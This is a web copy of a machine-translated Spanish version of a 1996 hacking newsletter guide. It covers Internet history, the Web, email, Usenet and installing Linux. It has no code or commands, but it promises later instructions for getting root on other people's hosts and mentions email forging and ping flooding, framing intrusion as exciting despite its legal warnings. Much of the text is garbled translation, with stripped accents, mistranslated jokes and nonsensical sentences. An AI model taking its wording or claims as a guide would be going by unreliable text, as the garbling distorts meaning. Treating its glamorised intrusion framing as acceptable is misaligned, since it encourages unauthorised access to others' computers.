Вы находитесь на странице: 1из 34

Hackear for Dummies

Contenido del Volumen 2:


Internet for Dummies
Linux!
Introduccin a TCP / IP
Puerto Surf!
____________________________________________________________
GUA PARA (casi) Inofensivo HACKING
Vol. 2 Nmero 1
Internet for Dummies - omitir esto si usted es un asistente de Unix. Pero si usted
lee en Obtendr algunas instrucciones de hacking ms kewl.
____________________________________________________________
Los seis Guas de (casi) Inofensivo hacking del Vol. 1 saltaron inmediatamente
en cmo hacer trucos de hacking.Pero si usted es como yo, todos esos detalles de
sondear los puertos y jugando con hiptesis y hacer ping a los hosts se pone un
poco de vrtigo.
As que qu hay de la captura de la respiracin, de pie atrs y revisar qu
diablos es lo que estamos jugando con?Una vez que tengamos los fundamentos
bajo control, podemos pasar a la piratera en serio.
Adems, he estado luchando con mi conciencia sobre la posibilidad de comenzar
a darle paso a paso las instrucciones sobre cmo obtener acceso root a los
ordenadores de otras personas. El pequeo ngel en mis susurros hombro
derecho, "Ganando la raz sin permiso en las computadoras de otras personas no
es agradable.As que no se lo digas a la gente cmo hacerlo. "El pequeo diablo
en mi hombro izquierdo, dice," Carolyn, todos estos hackers piensan que no
sabes nada! Proove a ellos ustedes saben cmo romper! "El pequeo ngel dice:"
Si alguno Gua de lectura para (casi) Inofensivo hacking ensaya este truco, usted
podra tener problemas con la ley por conspiracin para daar computadoras de
otras personas "La. pequeo diablo dice: "Pero, Carolyn, decirle a la gente cmo
romper en la raz y que se cree que es KEWL!"
As que aqu es el trato. En este y en los prximos nmeros de la Gua a (casi)
Inofensivo hacking te dir varias maneras de iniciar sesin como superusuario
en la cuenta de la raz de algunos equipos host de Internet. Pero las instrucciones
que dejarn una o dos cosas a la imaginacin.
Mi teora es que si usted est dispuesto a vadear a travs de todo esto, es
probable que no es uno de esos aspirantes a hackers emociones baratas que
utilizaran este conocimiento para hacer algo destructivo que podra terminar en
la crcel.
*****************************
Sugerencia tcnica: Si usted desea convertirse en un * * seria hacker, que
necesitar Linux (una variedad freeware de Unix) en su PC. Una razn es que
entonces se puede romper en la raz legalmente todo lo que quieras - en su
propia computadora. Se golpes seguros que luchan en todo en la computadora de
otra persona, slo para descubrir que lo que usted pensaba que era la raz fue una
trampa hbilmente y el administrador del sistema y la risa del FBI en todo el
camino a la crcel.
Linux puede ser instalado en un PC con tan slo una CPU 386, a slo 2 Mb
RAM y tan slo 20 MB de disco duro. Usted tendr que volver a formatear el
disco duro. Mientras que algunas personas se han instalado con xito Linux sin

destrozar sus cosas DOS / Windows, no cuente en salirse con la suya. Copia de
seguridad, copia de seguridad, copia de seguridad!
*****************************
*****************************
Usted puede ir a la crcel advertencia: Crack en la raz en el ordenador de otra
persona y la crcel se convierte en una clara posibilidad. Piense en esto: cuando
ves una noticia sobre algn hacker ser pillado, con qu frecuencia usted
reconoce el nombre? Con qu frecuencia es el ltimo busto est haciendo para
alguien famoso, como oscuro Tangente o Se7en o Emmanuel Goldstein? Qu
tal, como, nunca! Eso es porque realmente buenos hackers encontrar la manera
de no hacer cosas estpidas. Aprenden a agrietarse en las computadoras para el
desafo intelectual y de averiguar cmo hacer que las computadoras a salvo de
intrusos. Lo hacen no bull su camino en la raz y hacer un lo de cosas, que
tiende a inspirar a los administradores de sistemas a llamar a la polica.
*********************************
Aviso Emocionante: Es demasiado aburrido para simplemente cortar en su
propia mquina Linux? Colgar en l.Ira Winkler de la Asociacin Nacional de
Seguridad Informtica, Dean Garlick de la dinmica del espacio Lab de la
Universidad Estatal de Utah y yo estamos trabajando en la creacin de hack.net,
un lugar donde va a ser legal para entrar en los ordenadores. No slo eso,
estamos buscando patrocinadores que darn premios en efectivo y becas a los
que muestran las mayores habilidades de hacking. Ahora suena eso como ms
phun que la crcel?
*****************************
Por lo tanto, vamos a saltar en nuestros fundamentos de hacking tutorial con una
mirada a la anarqua maravilloso que es Internet.
Tenga en cuenta que estas guas a (casi) Inofensivo hacking enfoque en
Internet. Esto se debe a que hay muchas maneras legales para hackear en
Internet. Adems, hay ms de 10 millones de estas computadoras fcilmente
hackable en Internet, y el nmero crece cada da.
Conceptos bsicos de Internet
Nadie es dueo de la Internet. Nadie lo ejecuta. Nunca fue planeado para ser lo
que es hoy. Acaba de suceder, la consecuencia de un mutante 1969 Agencia de
Proyectos de Investigacin Avanzada de Defensa de EE.UU. experimento.
Este sistema anrquico permanece atado juntos porque sus usuarios obedecen
voluntariamente algunas reglas bsicas. Estas reglas se pueden resumir en dos
palabras: Unix y TCP / IP (con un guio a UUCP). Si usted entiende, realmente
entender Unix y TCP / IP (y UUCP), que se convertir en un pez nadando en el
mar del ciberespacio, un Uberhacker entre los aspirantes a hackers, un maestro
del universo de Internet.
Para obtener ayuda tcnica, Internet es una red distribuida en todo el mundo de
la informtica / comunicaciones se mantienen unidos por un estndar de
comunicaciones comn, / Protocolo de Internet Transmission Control Protocol
(TCP / IP) y un poco de UUCP. Estas normas permiten que cualquiera pueda
conectar un ordenador a Internet, que se convierte en otro nodo de esta red de
Internet. Todo lo que se necesita es obtener una direccin de Internet asignada al
nuevo equipo, que se conoce entonces como un Internet "anfitrin" y corbata en
un enlace de comunicaciones de Internet. Estos enlaces estn disponibles en casi
todas partes del mundo.

Si utiliza un servicio en lnea de su ordenador personal, usted tambin puede


convertirse temporalmente parte de la Internet. Hay dos formas principales para
conectar a un servicio en lnea.
Existe la conexin a la patata cybercouch que cada novato utiliza. Se requiere ya
sea un punto a punto (PPP) o SLIPconnection, lo que le permite ejecutar fotos
bonitas con el navegador web. Si tienes algn tipo de software empaquetado de
su ISP, le da automticamente este tipo de conexin.
O se puede conectar con un emulador de terminal a un host de Internet. Este
programa puede ser algo tan simple como el programa de Windows 3.1
"Terminal" en el icono "Accesorios". Una vez que haya marcado y conectado
slo eres otro terminal en este equipo anfitrin. No le dar cuadros bonitos. Esta
conexin ser similar a lo que se obtiene en un anticuado BBS. Pero si usted
sabe cmo utilizar este tipo de conexin, podra incluso darle acceso root a ese
host.
Pero, cmo est el equipo host utiliza conectado a Internet? Se va a correr un
poco de variedad del sistema operativo Unix. Desde Unix es tan fcil de
adaptarse a casi cualquier ordenador, esto significa que casi cualquier ordenador
puede llegar a ser un host de Internet.
Por ejemplo, a veces entro en Internet a travs de una serie que es un ordenador
Silicon Graphics Indigo en la Universidad del Estado de Utah. Su direccin de
Internet es fantasia.idec.sdl.usu.edu. Este es un equipo optimizado para el trabajo
de la animacin por ordenador, pero tambin puede funcionar como un host de
Internet. En otras ocasiones, el punto de entrada utilizado puede ser
pegasus.unm.edu, que es un IBM RS 6000 Modelo 370. Se trata de un equipo
optimizado para la investigacin en la Universidad de Nuevo Mxico.
Cualquier ordenador que puede ejecutar el software necesario - que es
bsicamente el sistema operativo Unix - tiene un mdem, y est vinculada a un
enlace de comunicaciones por Internet, puede convertirse en un nodo de
Internet. Incluso un PC puede convertirse en un servidor de Internet mediante la
ejecucin de uno de los sabores de Linux de Unix. Despus de su puesta en
marcha con Linux se puede acordar con el proveedor de Internet de su opcin de
vincular de forma permanente a Internet.
De hecho, muchos ISP utilizan nada ms que ordenadores conectados en red con
Linux!
Como resultado, toda la computacin, almacenamiento de datos y envo,
recepcin y envo de mensajes a travs de Internet es manejada por los millones
de ordenadores de muchos tipos y es propiedad de un sinnmero de empresas,
instituciones educativas, entidades gubernamentales e incluso particulares.
Cada uno de estos ordenadores tiene una direccin individual que le permite ser
alcanzado a travs de la Internet, si conectado a un enlace de comunicaciones
apropiado. Esta direccin puede ser representado de dos maneras: como un
nombre o un nmero.
Los enlaces de comunicaciones de Internet tambin son propiedad y mantenidos
de la misma manera anrquica como los anfitriones. Cada propietario de un host
de Internet es responsable de encontrar y pagar por un enlace de comunicaciones
que har que ese host atada con al menos otro anfitrin. Enlaces de
comunicaciones puede ser tan simple como una lnea telefnica, un enlace de
datos inalmbrica, como paquetes de datos digitales celulares, o tan complicado
como un enlace de fibra ptica de alta velocidad. Mientras el enlace de
comunicaciones puede utilizar TCP / IP o UUCP, se puede encajar en el Internet.

As, la red crece sin coordinacin general. Un nuevo propietario de un host de


Internet slo tiene que conseguir el permiso para atar en un enlace de
comunicaciones a otro anfitrin. Alternativamente, si el proveedor del enlace de
comunicaciones decide Este ordenador, por ejemplo, un paraso para los
spammers, se puede cortar este "sitio canalla" fuera de la Internet. El sitio de
pcaro debe entonces snooker algn vnculo otras comunicaciones en atar en
Internet de nuevo.
La forma en la mayora de estos ordenadores interconectados y comunicaciones
vincula el trabajo es a travs de la lengua comn del protocolo TCP /
IP. Bsicamente, TCP / IP rompe cualquier comunicacin de Internet en
discretos "paquetes". Cada paquete incluye informacin sobre la manera de
derrotar a l, de correccin de errores, y las direcciones del remitente y el
destinatario. La idea es que si se pierde un paquete, el remitente lo sabr y
vuelva a enviar el paquete. Cada paquete se puso en marcha entonces en el
Internet. Esta red puede elegir automticamente una ruta de nodo a nodo para
cada paquete utilizando lo que est disponible en el momento, y vuelve a montar
los paquetes en el mensaje completo en el equipo al que iba dirigida.
Estos paquetes pueden seguir rutas tortuosas. Por ejemplo, un paquete puede ir
desde un nodo en Boston a Amsterdam y de vuelta a los EE.UU. para el destino
final en Houston, mientras que otro paquete del mismo mensaje puede ser
enrutado a travs de Tokio y Atenas, y as sucesivamente. Por lo general, sin
embargo, los enlaces de comunicaciones no son tan tortuosa. Enlaces de
comunicacin pueden incluir la fibra ptica, lneas telefnicas y los satlites.
La fuerza de esta red de conmutacin de paquetes es que la mayora de los
mensajes obtendrn automticamente a travs de la congestin del trfico a
pesar mensaje pesado y muchos enlaces de comunicaciones estn fuera de
servicio. La desventaja es que los mensajes pueden simplemente desaparecer
dentro del sistema. Tambin puede ser difcil llegar a los ordenadores deseados
si los enlaces demasiadas comunicaciones no estn disponibles en el momento.
Sin embargo, todas estas maravillosas caractersticas tambin son
profundamente hackeable. El Internet es lo suficientemente robusto para
sobrevivir - por lo que sus inventores afirman - incluso la guerra nuclear. Sin
embargo, tambin es tan dbil que slo con un poco de instruccin, es posible
aprender a suplantar seriamente el sistema (correo electrnico forjado) o incluso
poner temporalmente fuera de servicio los equipos host de Internet de otras
personas (ping de inundaciones, por ejemplo.)
Por otra parte, las cabeceras de los paquetes que llevan los comandos de hacking
regalar la informacin de la cuenta de la que un hacker est funcionando. Por
esta razn, es difcil de ocultar perfectamente cuando en el Internet.
Es esta tensin entre este poder y la robustez y la debilidad y el potencial de
confusin que hace que Internet sea un parque infantil de piratera informtica.
Por ejemplo, AQU EST SU CONSEJO PIRATAS que has estado esperando
para este problema:
ftp://ftp.secnet.com
Este sitio ftp fue publicada en la lista BUGTRAQ, que se dedica a la discusin
de los agujeros de seguridad de Unix. Moderador es Aleph One, que es un
autntico Uberhacker. Si desea suscribirse a la BUGTRAQ, correo electrnico
LISTSERV@netspace.org con el mensaje "subscribe BUGTRAQ."
Ahora, de vuelta a lo bsico de Internet.
Historia del Internet

Como se mencion anteriormente, el Internet naci como un esfuerzo de Estados


Unidos Agencia de Proyectos de Investigacin Avanzada (ARPA) en 1969. Sus
inventores llamaron ARPANET. Pero a causa de su valor en la investigacin
cientfica, la Fundacin Nacional de Ciencia de Estados Unidos (NSF) se hizo
cargo en 1983. Pero en los aos transcurridos desde entonces evolucion
gradualmente lejos de cualquier fuente nica de control. En abril de 1995 la NSF
cort los ltimos faldas. Ahora Internet est dirigido por nadie. Simplemente
sucede y surge de los esfuerzos de aquellos que juegan con ella y la lucha con el
software y el hardware.
Nada de nada como esto nunca ha sucedido antes. Ahora tenemos un sistema
informtico con una vida propia.Nosotros, como los piratas informticos,
formamos una gran parte del motor de mutacin que mantiene el Internet en
evolucin y cada vez ms fuerte. Tambin formamos una gran parte del sistema
inmunolgico de esta extica criatura.
La idea original de ARPANET fue disear una red informtica y de las
comunicaciones que se convertira en lo redundante, tan robusto, y as poder
operar sin control centralizado, que incluso podra sobrevivir una guerra
nuclear. Lo que tambin pas es que ARPANET evolucion hasta convertirse en
un ser que ha sobrevivido a la final de la financiacin del gobierno, sin siquiera
un bache en su crecimiento. As pues, su descendencia anrquica, la Internet, ha
tenido xito ms all de los sueos ms salvajes de sus arquitectos originales.
El Internet ha crecido de manera explosiva, sin un final a la vista. En sus inicios
como ARPANET se celebr slo 4 anfitriones. Un cuarto de siglo ms tarde, en
1984, contena slo 1000 anfitriones. Pero en los prximos 5 aos, este nmero
creci diez veces a 10.000 (1989). Durante los 4 aos siguientes creci otra diez
veces a 1.000.000 (1993). Dos aos ms tarde, a finales de 1995, se estima que
la Internet para tener por lo menos 6 millones de equipos host. Probablemente
hay ms de 10 millones en la actualidad. No parece haber ningn final a la vista
an por el increble crecimiento de este nio mutante de ARPANET.
De hecho, una preocupacin planteada por el crecimiento exponencial de
Internet es que la demanda eventualmente puede ahora ganarle la carrera
capacidad. Porque ahora hay una entidad posee o controla Internet, si la
capacidad de los enlaces de comunicaciones entre nodos es demasiado pequeo,
y se convirtiera en serio empantanado, podra ser difcil de solucionar el
problema.
Por ejemplo, en 1988, Robert Morris, Jr. desat un programa tipo "virus" en la
Internet comnmente conocido como el "gusano de Morris." Este virus hara
copias de s mismo en cualquier equipo que era y luego enviar copias de las
comunicaciones enlaces a otros servidores de Internet. (Se utiliza un bug en
sendmail que permita el acceso a la raz, lo que permite que el virus de actuar
como superusuario).
Rpidamente la propagacin exponencial de este virus hizo el colapso de
Internet desde el espacio de trfico de comunicaciones y el disco es atado.
A la hora de Internet todava estaba bajo cierta apariencia de control por parte de
la Fundacin Nacional de Ciencia y estaba conectado a unos pocos miles de
ordenadores. La Red fue cerrado y todos los virus de la purificacin de sus
equipos host, y luego el neto fue puesto de nuevo en funcionamiento. Morris,
por su parte, fue puesto en la crcel.
Existe cierta preocupacin de que, a pesar de la mejora de las medidas de
seguridad (por ejemplo, "firewalls"), alguien puede encontrar una nueva manera

de lanzar un virus que podra nuevamente apagar el Internet. Dada la prdida de


control centralizado, reiniciando podra ser mucho ms tiempo si esto llegara a
suceder de nuevo.
Pero el restablecimiento de un control centralizado hoy como la que exista en el
momento de la "Gusano Morris" es probable que sea imposible. Incluso si fuera
posible, los arquitectos de ARPANET originales eran probablemente correctos
en su evaluacin de que la Red podra ser ms susceptibles de falla masiva en
lugar de menos si algn control centralizado se encontraban en el lugar.
Quizs la caracterstica ms significativa nica de la Internet de hoy es esta falta
de control centralizado. Ninguna persona u organizacin ahora es capaz de
controlar la Internet. De hecho, la dificultad del control se convirti en un
problema tan pronto como su primer ao de funcionamiento como
ARPANET. En ese ao de correo electrnico fue inventado espontneamente por
sus usuarios. Para sorpresa de los directivos de ARPANET, por el segundo ao
de correo electrnico representaron el grueso de la comunicacin a travs del
sistema.
Debido a que Internet haba crecido hasta tener una vida totalmente autnoma,
descentralizada propia, en abril de 1995, la NSF dej NSFNET financiacin, la
columna vertebral de las comunicaciones de fibra ptica que en un tiempo haba
dado NSF la tecnologa para controlar el sistema. La proliferacin de enlaces de
comunicaciones paralelas y anfitriones tenido para entonces omite por completo
cualquier posibilidad de control centralizado.
Hay varias caractersticas importantes de Internet:
* World Wide Web - una red editorial hipertexto y ahora la parte de ms rpido
crecimiento de la Internet.
* Correo electrnico - una forma de enviar mensajes electrnicos
* Usenet - foros en los que los usuarios pueden publicar y ver los mensajes
pblicos
* Telnet - una forma de la cuenta para los ordenadores remotos de Internet
* Protocolo de transferencia de archivos - una forma de descargar archivos desde
equipos remotos de Internet
* Internet Relay Chat - conversaciones de texto en tiempo real - utilizado
principalmente por los hackers y otros de Internet veteranos
* Gopher - una forma de catalogacin y bsqueda de informacin. Esto est
creciendo rpidamente obsoletos.
A medida que los surfistas portuarias saben, hay docenas de otros servicios
interesantes pero menos conocidas como whois, dedo, mesa de ping etc.
La red mundial
La World Wide Web es la principal caracterstica ms reciente de Internet, que
data de la primavera de 1992. Se compone de "pginas web", que son como las
pginas de un libro, y enlaces desde especialmente marcados palabras, frases o
smbolos en cada pgina a otras pginas Web. Estas pginas y enlaces juntos
crean lo que se conoce como "hipertexto". Esta tcnica permite atar juntos
muchos documentos diferentes que se podrn escribir por muchas personas y se
almacenan en muchos equipos diferentes de todo el mundo en un documento
hipertexto.
Esta tcnica se basa en el estndar Universal Resource Locator (URL), que
especifica cmo conectar con el ordenador y acceder a los archivos en su
interior, donde se pueden almacenar los datos de una pgina Web.

Un URL es siempre de la forma http: // <resto de direccin>, donde <resto de


direccin> incluye un nombre de dominio que debe ser registrado en una
organizacin llamada InterNIC para hacer que las dos pginas web diferentes (o
direcciones de correo electrnico seguro , o direcciones de computadora) no
terminan siendo idntica. Este registro es una de las pocas caractersticas de
control centralizados de Internet.
He aqu cmo funciona el hipertexto de la World Wide Web. El lector podra
llegar a una declaracin como "nuestra empresa ofrece el servicio de camiones
LTL a todas las principales ciudades de Estados Unidos." Si se pone de relieve
esta declaracin en la pgina "web", que significa que un clic de ratn de la
computadora del lector que l o ella se llevar a una nueva pgina web con los
detalles. Estos pueden incluir horarios completos y un formulario para llenar
para solicitar una recogida y entrega.
Algunas pginas Web incluso ofrecen maneras de hacer pagos electrnicos, por
lo general a travs de tarjetas de crdito.
Sin embargo, la seguridad de las transferencias de dinero a travs de Internet
sigue siendo un problema importante. Sin embargo, pese a las preocupaciones
con la verificabilidad de las transacciones financieras, el comercio electrnico a
travs de Internet est creciendo rpidamente. En su segundo ao de existencia,
1994, slo algunos $ 17,6 millones en las ventas se realizaron a travs de
Internet. Pero en 1995, las ventas alcanzaron los $ 400 millones. Hoy, en 1996,
la web se ha atascado con sitios comerciales que piden informacin de su tarjeta
de crdito.
Adems, la Web est siendo utilizado como una herramienta en la distribucin
de una nueva forma de moneda, conocido como dinero electrnico. Es
concebible que, si el obstculo de la verificabilidad se puede superar, que el
dinero electrnico (a menudo llamado ecash) puede jugar un papel importante en
la economa mundial, lo que simplifica el comercio internacional. Tambin
puede llegar a hacer que las monedas nacionales e incluso los impuestos tal
como lo conocemos obsoleto.
Ejemplos de sitios web donde se puede obtener ecash incluyen Mark Twain
Banco de St. Louis, MO (http://www.marktwain.com) y Digicash de
Amsterdam, Pases Bajos (http://www.digicash.com).
La naturaleza casi fuera de control de Internet se manifiesta en la World Wide
Web. El autor de una pgina web no tiene que pedir permiso o hacer cualquier
arreglo con los autores de otras pginas web a las que l o ella desea establecer
vnculos. Los enlaces pueden ser establecidos de forma automtica simplemente
con la programacin en las URL de los enlaces de la pgina Web que desee.
Por el contrario, la nica forma en que el autor de una pgina web puede evitar
que otras personas de su lectura o el establecimiento de enlaces de hipertexto a
ello es la creacin de un sistema de proteccin de contrasea (o por no contar
con enlaces de comunicaciones con el resto de la Internet).
Un problema con la World Wide Web es cmo encontrar cosas en l. Del mismo
modo que cualquier persona puede conectar un ordenador nuevo al Internet, por
lo que tambin existe una autoridad central con control o incluso el
conocimiento de lo que se publica en la World Wide Web. Nadie tiene que pedir
permiso de una autoridad central para poner una pgina Web.
Una vez que el usuario conoce la direccin (URL) de una pgina web, o por lo
menos la URL de una pgina Web que une finalmente a la pgina deseada,

entonces es posible (siempre que los enlaces de comunicaciones estn


disponibles) para casi instantneamente conectar con esta pgina.
Debido al valor de conocer las direcciones URL, ahora hay muchas empresas e
instituciones acadmicas que ofrecen ndices de bsqueda (ubicados en la Web)
en la World Wide Web. Programas automatizados como rastreadores Web buscar
en la Web y catalogar las direcciones URL que se encuentran en su viaje desde el
enlace de hipertexto a enlace de hipertexto. Pero debido a que la web est en
constante crecimiento y cambio, no hay manera de crear un catlogo exhaustivo
de toda la Web.
Email
El correo electrnico es el uso segunda ms antigua de la Internet, que se
remonta a la ARPAnet de 1972. (El primer uso fue permitir que las personas se
conecten de forma remota en que su eleccin de uno de los cuatro equipos en los
que ARPANET fue lanzado en 1971.)
Hay dos usos principales de correo electrnico: comunicaciones privadas, y el
correo electrnico transmitido.Cuando transmitido, correo electrnico sirve para
hacer anuncios (radiodifusin unidireccional), y para continuar las discusiones
entre grupos de personas, como nuestra lista Happy Hacker. En el modo de
grupo de discusin, cada mensaje enviado por todos los miembros de la lista se
transmite a todos los otros miembros.
Los dos tipos de programas ms utilizados para transmitir a los grupos de
discusin de correo electrnico son mayordomo y servidor de listas.
Usenet
Usenet era una consecuencia natural de la lista de discusin de grupo de correo
electrnico transmitido. Uno de los problemas con las listas de correo
electrnico es que no haba manera fcil para la gente nueva a estos grupos a
unirse a ellos. Otro problema es que a medida que el grupo crece, un miembro
puede ser inundado con decenas o cientos de mensajes de correo electrnico
cada da.
En 1979 estos problemas fueron abordados por el lanzamiento de Usenet. Usenet
se compone de grupos de usuarios que llevan en las discusiones en forma de
"mensajes". A diferencia de un grupo de discusin por correo electrnico, estos
mensajes se almacenan, por lo general durante dos semanas ms o menos, a la
espera de los lectores potenciales. Como los nuevos mensajes se envan a un
grupo de noticias, que se transmiten a todos los hosts de Internet que se ha
suscrito a llevar a los grupos de usuarios a los que pertenecen estos puestos.
Con muchos programas de conexin a Internet se puede ver las similitudes entre
Usenet y correo electrnico.Ambos tienen encabezados similares, que hacen un
seguimiento de su movimiento a travs de la Red. Algunos programas como el
pino se envan para enviar el mismo mensaje simultneamente a ambas
direcciones de correo electrnico y grupos de noticias. Todos los lectores de
noticias de Usenet le permiten enviar por correo electrnico a los autores de los
mensajes, y muchos tambin le permiten enviar por correo electrnico estos
mensajes s a usted oa otras personas.
Ahora, aqu es una visin general de los conceptos bsicos de Internet que
planeamos cubrir en los prximos nmeros de gua para (casi) Inofensivo de
Hacking:
1. Unix
Discutimos "cscaras", que le permiten a uno escribir programas ("scripts") que
automatizan serie complicada de comandos de Unix. El lector se introduce el

concepto de secuencias de comandos que realizan funciones de


hacking. Introducimos Perl, que es un lenguaje de programacin de shell
utilizado para la mayora de la lite de los scripts de hacking como SATAN.
3. TCP / IP y UUCP
Este captulo trata de los enlaces de comunicaciones que unen a Internet desde la
perspectiva de los piratas informticos. Se da especial atencin a UUCP ya que
es tan hackeable.
4. Direcciones de Internet, nombres de dominio y Routers
El lector se entera de cmo se enva la informacin a los lugares correctos en
Internet, y cmo los hackers puede hacer que se vaya a los lugares
equivocados! Cmo buscar hosts UUCP (que no estn bajo el sistema de
nombres de dominio) est incluido.
5. Fundamentos de Elite de Hacking: Puertos, paquetes y los permisos de
archivos
Esta seccin permite que el genio de la piratera en serio fuera de la
botella. Ofrece una serie de ejercicios en los que el lector puede disfrutar de
acceso a casi cualquier host de Internet elegido al azar. De hecho, al final del
captulo el lector habr tenido la oportunidad de practicar varias docenas de
tcnicas para ganar la entrada a las computadoras de otras personas. Sin
embargo, estos hacks que enseamos son 100% legal!
_________________________________________________________
Quiere suscribirse a esta lista? Email hacker@techbroker.com con el mensaje
"subscribe happyhacker." Quieres compartir algunos stuph kewl con la lista
Happy Hacker? Enve sus mensajes a hacker@techbroker.com. Para enviarme
correo electrnico confidencial (por favor, no hay discusin de actividades
ilegales) utilizan cmeinel@techbroker.com. Por favor, llamas directas a
dev/null@techbroker.com. Piratera feliz!
Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUA
PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al
final ..
________________________________________________________
________________________________________
GUA PARA (casi) Inofensivo HACKING
Vol. 2 Nmero 2
Linux!
________________________________________
Unix ha convertido en el sistema operativo primo de la Internet. De hecho, Unix
es el sistema operativo ms utilizado en el mundo entre los equipos con ms
poder que los PC.
Es cierto que Windows NT est subiendo ms rpido que un sistema operativo
comn de Internet, y es taaan maravillosamente buggy que parece que podra
convertirse en el nmero uno favorito para romper en. Pero hoy Unix en todas
sus maravillosos sabores todava es el sistema operativo para saber para ser un
hacker de verdad lite.
Hasta ahora hemos supuesto que usted ha estado hacking utilizando una cuenta
shell que se obtiene a travs de su proveedor de servicios Internet (ISP). Una
cuenta shell le permite dar comandos de Unix en una de las computadoras de su
ISP. Pero usted no tiene que depender de su proveedor de Internet para una
mquina que te permite jugar con Unix. Puede ejecutar Unix en su propio

ordenador y con una conexin SLIP o PPP ser conectado directamente a


Internet.
***********************
Newbie nota: Serial Line Internet Protocol (SLIP) y Point-to-Point Protocol
(PPP) conexiones que dan una direccin de Protocolo de Internet temporal (IP)
que le permite ser enganchado directamente a Internet. Tienes que utilizar SLIP
o conexiones PPP para llegar a utilizar un navegador Web que le da imgenes en
lugar de texto solamente. As que si usted puede ver las imgenes en la Web, ya
tiene uno de estos disponibles para usted.
La ventaja de utilizar una de estas conexiones directas para sus actividades de
hacking es que no vas a dejar atrs un archivo de registro de la cscara de
administrador de sistemas de su ISP para estudiar minuciosamente. Incluso si
usted no est violando la ley, un archivo de registro de shell que le muestra
haciendo un montn de stuph pirata informtico puede ser suficiente para
algunos administradores de sistemas para cerrar sumariamente su cuenta.
********************
Cul es el mejor tipo de equipo para ejecutar Unix en? A menos que seas un
hacker rico que piensa que nada de comprar una estacin de trabajo Sun SPARC,
es probable que mejor sabe hacer con algn tipo de PC. Hay casi un sinnmero
de variantes de Unix que se ejecutan en los ordenadores personales, y algunos
para Macs. La mayor parte de ellos son gratuitos para descargar, o
econmicamente disponible en CD-ROM.
Las tres variantes ms comunes de Unix que se ejecutan en los ordenadores son
de Sun Solaris, FreeBSD y Linux.Solaris cuesta alrededor de $ 700. Basta de
charla. FreeBSD es muy, muy bueno. Pero cont encontrar muchos manuales o
grupos de noticias que cubren FreeBSD.
Linux, sin embargo, tiene la ventaja de estar disponible en muchas variantes
(para que pueda divertirse mezclar y combinar los programas de las diferentes
ofertas de Linux). Lo ms importante, Linux es apoyado por muchos manuales,
grupos de noticias, listas de correo y sitios Web. Si usted tiene amigos de
hackers en su rea, la mayora de ellos probablemente usar Linux y pueden
ayudarte.
*********************
Nota histrica: Linux fue creado en 1991 por un grupo liderado por Linus
Torvalds, de la Universidad de Helsinki. Linux tiene derechos de autor bajo la
Licencia Pblica General de GNU. En virtud de este acuerdo, Linux puede ser
redistribuido a cualquiera que junto con el cdigo fuente. Cualquier persona
puede vender cualquier variante de Linux y modificarlo y volver a
empaquetar. Pero incluso si alguien modifica el cdigo fuente que l o ella no
puede reclamar derechos de autor para cualquier cosa creada a partir de
Linux. Cualquier persona que vende una versin modificada de Linux debe
proporcionar el cdigo fuente a los compradores y les permitir reutilizar en sus
productos comerciales sin cobrar derechos de licencia. Esta disposicin se
conoce como un "copyleft".
En virtud de esta disposicin, los creadores originales de Linux no reciben
licencias o shareware honorarios.Linus Torvalds y los muchos otros que han
contribuido a Linux han hecho desde la alegra de programacin y un sentido de
comunidad con todos los que se espera utilizar Linux en el espritu de buena
piratera tipo. Viva Linux!Viva Torvalds!
**********************

Linux consiste en el propio sistema operativo (llamado el "kernel"), adems de


un conjunto de programas asociados.
El kernel, como todos los tipos de Unix, es un sistema operativo multitarea y
multiusuario. A pesar de que utiliza una estructura de archivos diferente, y por lo
tanto no es directamente compatible con DOS y Windows, es tan flexible que
muchos programas DOS y Windows se pueden ejecutar mientras que en
Linux. As que un usuario avanzado probablemente querr arrancar en Linux y
luego ser capaz de ejecutar programas DOS y Windows desde Linux.
Programas asociados que vienen con la mayora de las distribuciones de Linux
pueden incluir:
* Un programa de shell (Bourne Again Shell - BASH - es ms comn);
* Compiladores para lenguajes de programacin como Fortran-77 (mi favorito!),
C, C ++, Pascal, LISP, Modula-2, Ada, Bsico (el mejor lenguaje para un
principiante), y Smalltalk .;
*, Una interfaz grfica de usuario X (a veces llamado X-Windows)
* Programas de utilidades como el pino lector de correo electrnico (mi favorito)
y Elm
Las diez principales razones para instalar Linux en su PC:
1. Cuando Linux es ilegal, slo los proscritos ser el propietario de Linux.
2. Cuando la instalacin de Linux, es muy divertido para ejecutar fdisk sin
copias de seguridad de primera.
3. Las llamas que obtiene de hacer preguntas sobre los grupos de noticias de
Linux son de una calidad superior a las llamas que recibe para su publicacin en
alt.sex.bestiality.
4.No importa qu sabor de Linux se instala, se dar cuenta maana haba una
ersin mucho ms 3l1te usted debe haber tenido lugar.
5.People que usan BSD gratis o Solaris no se burlan de ti. Ofrecern su simpata
en su lugar.
6.At la prxima Def Con podrs decir stuph como "as entonces su-ed a su
cuenta y grepped todos sus archivos de 'kissyface'." Vaya, grepping archivos de
otras personas es un no-no, olvidar que alguna vez suger.
Resaca 7.Port en la intimidad.
8.One palabra: exploits.
9.Installing Linux en su PC de la oficina es como ser un empleado de correos y
llevar una Uzi funcione.
10.But - - si instala Linux en su computadora de la oficina, que ser el jefe no
tiene ni idea de lo que eso significa.
Qu tipos de Linux funcionan mejor? Depende de lo que realmente
quieres. Redhat Linux es famoso por ser el ms fcil de instalar. El conjunto 3.0
CD-ROM Walnut Creek Linux tambin es muy fcil de instalar - para Linux,
que es! Mi enfoque ha sido el de conseguir un montn de versiones de Linux y
mezclar y combinar lo mejor de cada distribucin.
Me gusta la versin de Walnut Creek mejor porque con mi marca X hardware, su
caracterstica de deteccin automtica era un salvavidas.
Instalacin de Linux no es para los dbiles de corazn! Varios consejos para
sobrevivir a la instalacin son:
1) A pesar de que en teora puede ejecutar Linux en un 286 con 4 MB de RAM y
dos unidades de disquete, es * mucho * ms fciles con un 486 o superior con 8
MB de RAM, un CD-ROM, y por lo menos 200 MB de disco duro libre espacio.

2) Conocer tanto como sea posible acerca de qu tipo de placa madre, mdem,
disco duro, CD-ROM y tarjeta de vdeo que tenga. Si usted tiene alguna
documentacin para ellos, ellos tienen a la mano para hacer referencia durante la
instalacin.
3) Se trabaja mejor utilizar hardware que es el nombre de la marca y un poco
fuera de fecha en su computadora.Debido a que Linux es un programa gratuito,
que no ofrece controladores de dispositivo para todo el hardware ms reciente. Y
si su hardware es como el mo - un montn de la marca X y El Cheapo stuph,
puede tomar mucho tiempo experimentando con lo que los conductores
trabajarn.
4) Antes de comenzar la instalacin, haga una copia de seguridad del disco duro
(s)! En teora se puede instalar Linux sin daar sus archivos DOS /
